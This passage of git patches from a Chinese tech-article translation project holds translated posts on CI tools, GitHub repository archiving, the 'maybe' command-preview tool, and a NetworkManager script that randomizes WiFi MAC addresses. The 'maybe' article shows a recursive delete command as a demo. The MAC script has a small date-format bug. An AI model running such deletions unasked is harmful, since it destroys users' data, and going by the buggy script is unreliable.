的说法,本月早些时候,Apache MXNet 社区推出了 MXNet 的 0.12 版本,它扩展了 Gluon 的功能,以便进行新的尖端研究。它的新功能之一是变分 dropout,它允许开发人员使用 dropout 技术来缓解递归神经网络中的过拟合。 @@ -52,15 +52,15 @@ Tractica 的 Kaul 指出:“框架互操作性是一件好事,这会帮助 越来越多的大型科技公司已经宣布使用开源技术来加快 AI 协作开发的计划,以便创建更加统一的开发和研究平台。 AT&T 几周前宣布了与 TechMahindra 和 Linux 基金会合作[推出 Acumos 项目][8]的计划。该平台旨在开拓电信、媒体和技术方面的合作。 -![](https://www.ectnews.com/images/end-enn.gif) + -------------------------------------------------------------------------------- via: https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html -作者:[ David Jones ][a] +作者:[David Jones][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 5abd318410232ce883032b1fcb1628c9319b8eec Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 11 Dec 2017 09:06:13 +0800 Subject: [PATCH 0485/1627] translated --- .../20171107 GitHub welcomes all CI tools.md | 95 ------------------- .../20171107 GitHub welcomes all CI tools.md | 93 ++++++++++++++++++ 2 files changed, 93 insertions(+), 95 deletions(-) delete mode 100644 sources/tech/20171107 GitHub welcomes all CI tools.md create mode 100644 translated/tech/20171107 GitHub welcomes all CI tools.md diff --git a/sources/tech/20171107 GitHub welcomes all CI tools.md b/sources/tech/20171107 GitHub welcomes all CI tools.md deleted file mode 100644 index 7bef351bd6..0000000000 --- a/sources/tech/20171107 GitHub welcomes all CI tools.md +++ /dev/null @@ -1,95 +0,0 @@ -translating---geekpi - -GitHub welcomes all CI tools -==================== - - -[![GitHub and all CI tools](https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png)][11] - -Continuous Integration ([CI][12]) tools help you stick to your team's quality standards by running tests every time you push a new commit and [reporting the results][13] to a pull request. Combined with continuous delivery ([CD][14]) tools, you can also test your code on multiple configurations, run additional performance tests, and automate every step [until production][15]. - -There are several CI and CD tools that [integrate with GitHub][16], some of which you can install in a few clicks from [GitHub Marketplace][17]. With so many options, you can pick the best tool for the job—even if it's not the one that comes pre-integrated with your system. - -The tools that will work best for you depends on many factors, including: - -* Programming language and application architecture - -* Operating system and browsers you plan to support - -* Your team's experience and skills - -* Scaling capabilities and plans for growth - -* Geographic distribution of dependent systems and the people who use them - -* Packaging and delivery goals - -Of course, it isn't possible to optimize your CI tool for all of these scenarios. The people who build them have to choose which use cases to serve best—and when to prioritize complexity over simplicity. For example, if you like to test small applications written in a particular programming language for one platform, you won't need the complexity of a tool that tests embedded software controllers on dozens of platforms with a broad mix of programming languages and frameworks. - -If you need a little inspiration for which CI tool might work best, take a look at [popular GitHub projects][18]. Many show the status of their integrated CI/CD tools as badges in their README.md. We've also analyzed the use of CI tools across more than 50 million repositories in the GitHub community, and found a lot of variety. The following diagram shows the relative percentage of the top 10 CI tools used with GitHub.com, based on the most used [commit status contexts][19] used within our pull requests. - - _Our analysis also showed that many teams use more than one CI tool in their projects, allowing them to emphasize what each tool does best._ - - [![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] - -If you'd like to check them out, here are the top 10 tools teams use: - -* [Travis CI][1] - -* [Circle CI][2] - -* [Jenkins][3] - -* [AppVeyor][4] - -* [CodeShip][5] - -* [Drone][6] - -* [Semaphore CI][7] - -* [Buildkite][8] - -* [Wercker][9] - -* [TeamCity][10] - -It's tempting to just pick the default, pre-integrated tool without taking the time to research and choose the best one for the job, but there are plenty of [excellent choices][21] built for your specific use cases. And if you change your mind later, no problem. When you choose the best tool for a specific situation, you're guaranteeing tailored performance and the freedom of interchangability when it no longer fits. - -Ready to see how CI tools can fit into your workflow? - -[Browse GitHub Marketplace][22] - --------------------------------------------------------------------------------- - -via: https://github.com/blog/2463-github-welcomes-all-ci-tools - -作者:[jonico ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://github.com/jonico -[1]:https://travis-ci.org/ -[2]:https://circleci.com/ -[3]:https://jenkins.io/ -[4]:https://www.appveyor.com/ -[5]:https://codeship.com/ -[6]:http://try.drone.io/ -[7]:https://semaphoreci.com/ -[8]:https://buildkite.com/ -[9]:http://www.wercker.com/ -[10]:https://www.jetbrains.com/teamcity/ -[11]:https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png -[12]:https://en.wikipedia.org/wiki/Continuous_integration -[13]:https://github.com/blog/2051-protected-branches-and-required-status-checks -[14]:https://en.wikipedia.org/wiki/Continuous_delivery -[15]:https://developer.github.com/changes/2014-01-09-preview-the-new-deployments-api/ -[16]:https://github.com/works-with/category/continuous-integration -[17]:https://github.com/marketplace/category/continuous-integration -[18]:https://github.com/explore?trending=repositories#trending -[19]:https://developer.github.com/v3/repos/statuses/ -[20]:https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png -[21]:https://github.com/works-with/category/continuous-integration -[22]:https://github.com/marketplace/category/continuous-integration diff --git a/translated/tech/20171107 GitHub welcomes all CI tools.md b/translated/tech/20171107 GitHub welcomes all CI tools.md new file mode 100644 index 0000000000..a20d164014 --- /dev/null +++ b/translated/tech/20171107 GitHub welcomes all CI tools.md @@ -0,0 +1,93 @@ +GitHub 欢迎所有 CI 工具 +==================== + + +[![GitHub and all CI tools](https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png)][11] + +持续集成([CI][12])工具可以帮助你在每次提交时执行测试,并将[报告结果][13]提交到合并请求,从而帮助维持团队的质量标准。结合持续交付([CD][14])工具,你还可以在多种配置上测试你的代码,运行额外的性能测试,并自动执行每个步骤[直到产品][15]。 + +有几个[与 GitHub 集成][16]的 CI 和 CD 工具,其中一些可以在 [GitHub Marketplace][17] 中点击几下安装。有了这么多的选择,你可以选择最好的工具 - 即使它不是与你的系统预集成的工具。 + +最适合你的工具取决于许多因素,其中包括: + +* 编程语言和程序架构 + +* 你计划支持的操作系统和浏览器 + +* 你团队的经验和技能 + +* 扩展能力和增长计划 + +* 依赖系统的地理分布和使用的人 + +* 打包和交付目标 + +当然,无法为所有这些情况优化你的 CI 工具。构建它们的人需要选择哪些情况服务更好,何时优先考虑复杂性而不是简单性。例如,如果你想测试针对一个平台的用特定语言编写的小程序,那么你就不需要那些可在数十个平台上测试,有许多编程语言和框架的,用来测试嵌入软件控制器的复杂工具。 + +如果你需要一些灵感来挑选最好使用哪个 CI 工具,那么看一下[ Github 上的流行项目][18]。许多人在他们的 README.md 中将他们的集成的 CI/CD 工具的状态显示为徽章。我们还分析了 GitHub 社区中超过 5000 万个仓库中 CI 工具的使用情况,并发现了很多变化。下图显示了根据我们的 pull 请求中使用最多的[提交状态上下文][19],GitHub.com 使用的前 10 个 CI 工具的相对百分比。 + +_我们的分析还显示,许多团队在他们的项目中使用多个 CI 工具,使他们能够发挥它们最擅长的。_ + + [![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] + +如果你想查看,下面是团队中使用最多的 10 个工具: + +* [Travis CI][1] + +* [Circle CI][2] + +* [Jenkins][3] + +* [AppVeyor][4] + +* [CodeShip][5] + +* [Drone][6] + +* [Semaphore CI][7] + +* [Buildkite][8] + +* [Wercker][9] + +* [TeamCity][10] + +这只是尝试选择默认的、预先集成的工具,而没有花时间根据任务研究和选择最好的工具,但是对于你的特定情况会有很多[很好的选择][21]。如果你以后改变主意,没问题。当你为特定情况选择最佳工具时,你可以保证量身定制的性能和不再适合时互换的自由。 + +准备好了解 CI 工具如何适应你的工作流程了么? + +[浏览 GitHub Marketplace][22] + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2463-github-welcomes-all-ci-tools + +作者:[jonico ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/jonico +[1]:https://travis-ci.org/ +[2]:https://circleci.com/ +[3]:https://jenkins.io/ +[4]:https://www.appveyor.com/ +[5]:https://codeship.com/ +[6]:http://try.drone.io/ +[7]:https://semaphoreci.com/ +[8]:https://buildkite.com/ +[9]:http://www.wercker.com/ +[10]:https://www.jetbrains.com/teamcity/ +[11]:https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png +[12]:https://en.wikipedia.org/wiki/Continuous_integration +[13]:https://github.com/blog/2051-protected-branches-and-required-status-checks +[14]:https://en.wikipedia.org/wiki/Continuous_delivery +[15]:https://developer.github.com/changes/2014-01-09-preview-the-new-deployments-api/ +[16]:https://github.com/works-with/category/continuous-integration +[17]:https://github.com/marketplace/category/continuous-integration +[18]:https://github.com/explore?trending=repositories#trending +[19]:https://developer.github.com/v3/repos/statuses/ +[20]:https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png +[21]:https://github.com/works-with/category/continuous-integration +[22]:https://github.com/marketplace/category/continuous-integration From 4fd8bbbaf391c06c2149178577f0dd4314723153 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 11 Dec 2017 09:12:10 +0800 Subject: [PATCH 0486/1627] translating --- ...204 FreeCAD – A 3D Modeling and Design Software for Linux.md | 2 ++ ...4 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md | 2 ++ 2 files changed, 4 insertions(+) diff --git a/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md b/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md index 6df21bce1b..fbcbacaf7f 100644 --- a/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md +++ b/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md @@ -1,3 +1,5 @@ +translating---geekpi + FreeCAD – A 3D Modeling and Design Software for Linux ============================================================ ![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png) diff --git a/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md b/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md index 42556932c1..2564f94ded 100644 --- a/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md +++ b/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md @@ -1,3 +1,5 @@ +translating---geekpi + # GNOME Boxes Makes It Easier to Test Drive Linux Distros ![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg) From 96d9a191ab3afd1429320cccd0889e3912051b32 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 17:37:58 +0800 Subject: [PATCH 0487/1627] PRF&PUB:20171108 Archiving repositories.md @geekpi --- .../20171108 Archiving repositories.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) rename {translated/tech => published}/20171108 Archiving repositories.md (59%) diff --git a/translated/tech/20171108 Archiving repositories.md b/published/20171108 Archiving repositories.md similarity index 59% rename from translated/tech/20171108 Archiving repositories.md rename to published/20171108 Archiving repositories.md index 3d1a328541..4ed822a7f2 100644 --- a/translated/tech/20171108 Archiving repositories.md +++ b/published/20171108 Archiving repositories.md @@ -1,20 +1,19 @@ -归档仓库 +如何归档 GitHub 仓库 ==================== - -因为仓库不再活跃开发或者你不想接受额外的贡献并不意味着你想要删除它。现在在 Github 上归档仓库让它变成只读。 +如果仓库不再活跃开发或者你不想接受额外的贡献,但这并不意味着你想要删除它。现在可以在 Github 上归档仓库让它变成只读。 [![archived repository banner](https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png)][1] -归档一个仓库让它对所有人只读(包括仓库拥有者)。这包括编辑仓库、问题、合并请求、标记、里程碑、维基、发布、提交、标签、分支、反馈和评论。没有人可以在一个归档的仓库上创建新的问题、合并请求或者评论,但是你仍可以 fork 仓库-允许归档的仓库在其他地方继续开发。 +归档一个仓库会让它对所有人只读(包括仓库拥有者)。这包括对仓库的编辑、问题issue合并请求pull request(PR)、标记、里程碑、项目、维基、发布、提交、标签、分支、反馈和评论。谁都不可以在一个归档的仓库上创建新的问题、合并请求或者评论,但是你仍可以 fork 仓库——以允许归档的仓库在其它地方继续开发。 -要归档一个仓库,进入仓库设置页面并点在这个仓库上点击归档。 +要归档一个仓库,进入仓库设置页面并点在这个仓库上点击“归档该仓库Archive this repository”。 [![archive repository button](https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png)][2] -在归档你的仓库前,确保你已经更改了它的设置并考虑关闭所有的开放问题和合并请求。你还应该更新你的 README 和描述来让它让访问者了解他不再能够贡献。 +在归档你的仓库前,确保你已经更改了它的设置并考虑关闭所有的开放问题和合并请求。你还应该更新你的 README 和描述来让它让访问者了解他不再能够对之贡献。 -如果你改变了主意想要解除归档你的仓库,在相同的地方点击解除归档。请注意大多数归档仓库的设置是隐藏的,并且你需要解除归档来改变它们。 +如果你改变了主意想要解除归档你的仓库,在相同的地方点击“解除归档该仓库Unarchive this repository”。请注意归档仓库的大多数设置是隐藏的,你需要解除归档才能改变它们。 [![archived labelled repository](https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png)][3] @@ -24,9 +23,9 @@ via: https://github.com/blog/2460-archiving-repositories -作者:[MikeMcQuaid ][a] +作者:[MikeMcQuaid][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From d2389afea700fb3634d260a3a4f2b06b0c6b7a2d Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 18:12:54 +0800 Subject: [PATCH 0488/1627] PRF&PUB:20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @imquanquan 定时发布 https://linux.cn/article-9131-1.html --- ...ram Will Exactly Do Before Executing It.md | 37 +++++++++---------- 1 file changed, 17 insertions(+), 20 deletions(-) rename {translated/tech => published}/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md (61%) diff --git a/translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md b/published/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md similarity index 61% rename from translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md rename to published/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md index 5123c87df9..10d38dde17 100644 --- a/translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md +++ b/published/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md @@ -1,21 +1,23 @@ -如何获知一个命令或程序在执行前将会做什么 +如何在执行一个命令或程序之前就了解它会做什么 ====== -有没有想过一个 Unix 命令在执行前将会干些什么呢?并不是每个人都会知道一个特定的命令或者程序将会做什么。当然,你可以用 [Explainshell][2] 来查看它。你可以在 Explainshell 网站中粘贴你的命令,然后它可以让你了解命令的每个部分做了什么。但是,这是没有必要的。现在,我们从终端就可以轻易地知道一个命令或者程序在执行前会做什么。 `maybe` ,一个简单的工具,它允许你运行一条命令并可以查看此命令对你的文件系统做了什么而实际上这条命令却并未执行!在查看 `maybe` 的输出列表后,你可以决定是否真的想要运行这条命令。 +有没有想过在执行一个 Unix 命令前就知道它干些什么呢?并不是每个人都会知道一个特定的命令或者程序将会做什么。当然,你可以用 [Explainshell][2] 来查看它。你可以在 Explainshell 网站中粘贴你的命令,然后它可以让你了解命令的每个部分做了什么。但是,这是没有必要的。现在,我们从终端就可以轻易地在执行一个命令或者程序前就知道它会做什么。 `maybe` ,一个简单的工具,它允许你运行一条命令并可以查看此命令对你的文件做了什么,而实际上这条命令却并未执行!在查看 `maybe` 的输出列表后,你可以决定是否真的想要运行这条命令。 -#### “maybe”是如何工作的 +![](https://www.ostechnix.com/wp-content/uploads/2017/12/maybe-2-720x340.png) -根据开发者的介绍 +### `maybe` 是如何工作的 -> `maybe` 利用 `python-ptrace` 库运行了一个在 `ptrace` 控制下的进程。当它截取到一个即将更改文件系统的系统调用时,它会记录该调用,然后修改 CPU 寄存器,将这个调用重定向到一个无效的系统调用 ID(将其变成一个无效操作(no-op)),并将这个无效操作(no-op)的返回值设置为有效操作的返回值。结果,这个进程认为,它所做的一切都发生了,实际上什么都没有改变。 +根据开发者的介绍: -警告: 在生产环境或者任何你所关心的系统里面使用这个工具时都应该小心。它仍然可能造成严重的损失,因为它只能阻止少数系统调用。 +> `maybe` 利用 `python-ptrace` 库在 `ptrace` 控制下运行了一个进程。当它截取到一个即将更改文件系统的系统调用时,它会记录该调用,然后修改 CPU 寄存器,将这个调用重定向到一个无效的系统调用 ID(效果上将其变成一个无效操作(no-op)),并将这个无效操作(no-op)的返回值设置为有效操作的返回值。结果,这个进程认为,它所做的一切都发生了,实际上什么都没有改变。 -#### 安装 “maybe” +警告:在生产环境或者任何你所关心的系统里面使用这个工具时都应该小心。它仍然可能造成严重的损失,因为它只能阻止少数系统调用。 + +#### 安装 `maybe` 确保你已经在你的 Linux 系统中已经安装了 `pip` 。如果没有,可以根据您使用的发行版,按照如下指示进行安装。 -在 Arch Linux 及其衍生产品(如 Antergos,Manjaro Linux)上,使用以下命令安装 `pip` : +在 Arch Linux 及其衍生产品(如 Antergos、Manjaro Linux)上,使用以下命令安装 `pip` : ``` sudo pacman -S python-pip @@ -25,8 +27,6 @@ sudo pacman -S python-pip ``` sudo yum install epel-release -``` -``` sudo yum install python-pip ``` @@ -34,8 +34,6 @@ sudo yum install python-pip ``` sudo dnf install epel-release -``` -``` sudo dnf install python-pip ``` @@ -45,19 +43,19 @@ sudo dnf install python-pip sudo apt-get install python-pip ``` -在 SUSE, openSUSE 上: +在 SUSE、 openSUSE 上: ``` sudo zypper install python-pip ``` -安装 `pip` 后,运行以下命令安装 `maybe` 。 +安装 `pip` 后,运行以下命令安装 `maybe` : ``` sudo pip install maybe ``` -#### 了解一个命令或程序在执行前会做什么 +### 了解一个命令或程序在执行前会做什么 用法是非常简单的!只要在要执行的命令前加上 `maybe` 即可。 @@ -83,8 +81,7 @@ Do you want to rerun rm -r ostechnix/ and permit these operations? [y/N] y [![](http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png)][3] - - `maybe` 执行 5 个文件系统操作,并向我显示该命令(rm -r ostechnix /)究竟会做什么。现在我可以决定是否应该执行这个操作。是不是很酷呢?确实很酷! + `maybe` 执行了 5 个文件系统操作,并向我显示该命令(`rm -r ostechnix/`)究竟会做什么。现在我可以决定是否应该执行这个操作。是不是很酷呢?确实很酷! 这是另一个例子。我要为 Gmail 安装 Inboxer 桌面客户端。这是我得到的输出: @@ -122,9 +119,9 @@ maybe has not detected any file system operations from sudo pacman -Syu. Cheers! -资源: +资源: -* [“maybe” GitHub page][1] +* [`maybe` GitHub 主页][1] -------------------------------------------------------------------------------- @@ -132,7 +129,7 @@ via: https://www.ostechnix.com/know-command-program-will-exactly-executing/ 作者:[SK][a] 译者:[imquanquan](https://github.com/imquanquan) -校对:[校对ID](https://github.com/校对ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From a7e0ea96ddcffb977507ff27c8e03a64b7212cea Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 19:05:04 +0800 Subject: [PATCH 0489/1627] PRF&PUB:20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @wenwensnow --- ...e your WiFi MAC address on Ubuntu 16.04.md | 161 ++++++++++++++++ ...e your WiFi MAC address on Ubuntu 16.04.md | 180 ------------------ 2 files changed, 161 insertions(+), 180 deletions(-) create mode 100644 published/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md delete mode 100644 translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md diff --git a/published/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/published/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md new file mode 100644 index 0000000000..5dcb985fcd --- /dev/null +++ b/published/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -0,0 +1,161 @@ +在 Ubuntu 16.04 下随机化你的 WiFi MAC 地址 +============================================================ + +> 你的设备的 MAC 地址可以在不同的 WiFi 网络中记录你的活动。这些信息能被共享后出售,用于识别特定的个体。但可以用随机生成的伪 MAC 地址来阻止这一行为。 + + +![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) + +_Image courtesy of [Cloudessa][4]_ + +每一个诸如 WiFi 或者以太网卡这样的网络设备,都有一个叫做 MAC 地址的唯一标识符,如:`b4:b6:76:31:8c:ff`。这就是你能上网的原因:每当你连上 WiFi,路由器就会用这一地址来向你接受和发送数据,并且用它来区别你和这一网络的其它设备。 + +这一设计的缺陷在于唯一性,不变的 MAC 地址正好可以用来追踪你。连上了星巴克的 WiFi? 好,注意到了。在伦敦的地铁上? 也记录下来。 + +如果你曾经在某一个 WiFi 验证页面上输入过你的真实姓名,你就已经把自己和这一 MAC 地址建立了联系。没有仔细阅读许可服务条款、你可以认为,机场的免费 WiFi 正通过出售所谓的 ‘顾客分析数据’(你的个人信息)获利。出售的对象包括酒店,餐饮业,和任何想要了解你的人。 + +我不想信息被记录,再出售给多家公司,所以我花了几个小时想出了一个解决方案。 + +### MAC 地址不一定总是不变的 + +幸运的是,在不断开网络的情况下,是可以随机生成一个伪 MAC 地址的。 + +我想随机生成我的 MAC 地址,但是有三个要求: + +1. MAC 地址在不同网络中是不相同的。这意味着,我在星巴克和在伦敦地铁网络中的 MAC 地址是不相同的,这样在不同的服务提供商中就无法将我的活动系起来。 +2. MAC 地址需要经常更换,这样在网络上就没人知道我就是去年在这儿经过了 75 次的那个人。 +3. MAC 地址一天之内应该保持不变。当 MAC 地址更改时,大多数网络都会与你断开连接,然后必须得进入验证页面再次登陆 - 这很烦人。 + +### 操作网络管理器NetworkManager + +我第一次尝试用一个叫做 `macchanger` 的工具,但是失败了。因为网络管理器NetworkManager会根据它自己的设置恢复默认的 MAC 地址。 + +我了解到,网络管理器 1.4.1 以上版本可以自动生成随机的 MAC 地址。如果你在使用 Ubuntu 17.04 版本,你可以根据[这一配置文件][7]实现这一目的。但这并不能完全符合我的三个要求(你必须在随机random稳定stable这两个选项之中选择一个,但没有一天之内保持不变这一选项) + +因为我使用的是 Ubuntu 16.04,网络管理器版本为 1.2,不能直接使用高版本这一新功能。可能网络管理器有一些随机化方法支持,但我没能成功。所以我编了一个脚本来实现这一目标。 + +幸运的是,网络管理器 1.2 允许模拟 MAC 地址。你在已连接的网络中可以看见 ‘编辑连接’ 这一选项: + +![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https:/www.paulfurley.com/img/network-manager-cloned-mac-address.png) + +网络管理器也支持钩子处理 —— 任何位于 `/etc/NetworkManager/dispatcher.d/pre-up.d/` 的脚本在建立网络连接之前都会被执行。 + + +### 分配随机生成的伪 MAC 地址 + +我想根据网络 ID 和日期来生成新的随机 MAC 地址。 我们可以使用网络管理器的命令行工具 nmcli 来显示所有可用网络: + + +``` +> nmcli connection +NAME UUID TYPE DEVICE +Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 +DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- +PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- +virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- +``` + +因为每个网络都有一个唯一标识符(UUID),为了实现我的计划,我将 UUID 和日期拼接在一起,然后使用 MD5 生成 hash 值: + +``` +# eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 + +> echo -n "${UUID}-$(date +%F)" | md5sum + +53594de990e92f9b914a723208f22b3f - +``` + +生成的结果可以代替 MAC 地址的最后八个字节。 + + +值得注意的是,最开始的字节 `02` 代表这个地址是[自行指定][8]的。实际上,真实 MAC 地址的前三个字节是由制造商决定的,例如 `b4:b6:76` 就代表 Intel。 + +有可能某些路由器会拒绝自己指定的 MAC 地址,但是我还没有遇到过这种情况。 + +每次连接到一个网络,这一脚本都会用 `nmcli` 来指定一个随机生成的伪 MAC 地址: + +![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/imgterminal-window-nmcli-commands.png) + +最后,我查看了 `ifconfig` 的输出结果,我发现 MAC 地址 `HWaddr` 已经变成了随机生成的地址(模拟 Intel 的),而不是我真实的 MAC 地址。 + + +``` +> ifconfig +wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d + inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 + inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 + TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) + +``` + +### 脚本 + +完整的脚本也可以[在 Github 上查看][9]。 + +``` +#!/bin/sh + +# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses + +# Configure every saved WiFi connection in NetworkManager with a spoofed MAC +# address, seeded from the UUID of the connection and the date eg: +# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' + +# This makes your MAC impossible(?) to track across WiFi providers, and +# for one provider to track across days. + +# For craptive portals that authenticate based on MAC, you might want to +# automate logging in :) + +# Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar +# automatically. + +export PATH=$PATH:/usr/bin:/bin + +LOG_FILE=/var/log/randomize-mac-addresses + +echo "$(date): $*" > ${LOG_FILE} + +WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) + +for UUID in ${WIFI_UUIDS} +do + UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) + + RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" + + CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" + + echo "$CMD" >> ${LOG_FILE} + $CMD & +done + +wait +``` + +_更新:[使用自己指定的 MAC 地址][5]可以避免和真正的 intel 地址冲突。感谢 [@_fink][6]_ + +--------------------------------------------------------------------------------- + +via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ + +作者:[Paul M Furley][a] +译者:[wenwensnow](https://github.com/wenwensnow) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.paulfurley.com/ +[1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abcarandomize-mac-addresses +[2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses +[3]:https://github.com/ +[4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ +[5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef +[6]:https://twitter.com/fink_/status/937305600005943296 +[7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ +[8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local +[9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f \ No newline at end of file diff --git a/translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md deleted file mode 100644 index a5e50edc89..0000000000 --- a/translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md +++ /dev/null @@ -1,180 +0,0 @@ - - 在Ubuntu 16.04下随机生成你的WiFi MAC地址 - ============================================================ - - 你设备的MAC地址可以在不同的WiFi网络中记录你的活动。这些信息能被共享后出售,用于识别特定的个体。但可以用随机生成的伪MAC地址来阻止这一行为。 - - - ![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) - - _Image courtesy of [Cloudessa][4]_ - - 每一个诸如WiFi或者以太网卡这样的网络设备,都有一个叫做MAC地址的唯一标识符,如:`b4:b6:76:31:8c:ff`。这就是你能上网的原因:每当你连接上WiFi,路由器就会用这一地址来向你接受和发送数据,并且用它来区别你和这一网络的其他设备。 - - 